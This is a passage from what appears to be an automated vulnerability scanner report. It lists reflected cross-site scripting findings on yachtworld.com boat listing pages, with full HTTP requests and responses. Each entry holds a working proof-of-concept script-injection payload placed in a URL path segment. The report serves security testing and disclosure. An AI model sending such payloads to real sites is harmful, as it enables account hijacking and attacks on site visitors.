2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:35 GMT
Set-Cookie: VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&25f13"><script>alert(1)</script>64310e7d56b=1&currency=USD&units=Feet&seo=0&checked_boats=2250145&boat_id=2250145&back=/core/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States&boat_id=2250145">
...[SNIP]...

3.161. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac22f"><script>alert(1)</script>1249e79c112 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Fs-2203131/Port-Clintonac22f"><script>alert(1)</script>1249e79c112/OH/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:44 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 20 Jan 2011 19:08:49 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:44 GMT
Set-Cookie: VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2203131&boat_id=2203131&back=/core/boats/2008/Regulator-32-Fs-2203131/Port-Clintonac22f"><script>alert(1)</script>1249e79c112/OH/United-States&boat_id=2203131">
...[SNIP]...

3.162. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 686aa"><script>alert(1)</script>8108ea0f138 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH686aa"><script>alert(1)</script>8108ea0f138/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:19 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 20 Jan 2011 19:08:49 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:19 GMT
Set-Cookie: VIEWED_BOATS_STORE=2203131%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B188%2C900%5B%25%5DPort+Clinton%2C+OH%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F0%2F3%2F1%2F2203131_13_mini.jpg%3F1282073289000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2203131%2FPort-Clinton%2FOH%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2203131&boat_id=2203131&back=/core/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH686aa"><script>alert(1)</script>8108ea0f138/United-States&boat_id=2203131">
...[SNIP]...

3.163. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52069"><script>alert(1)</script>deba5c42268 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States52069"><script>alert(1)</script>deba5c42268 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; 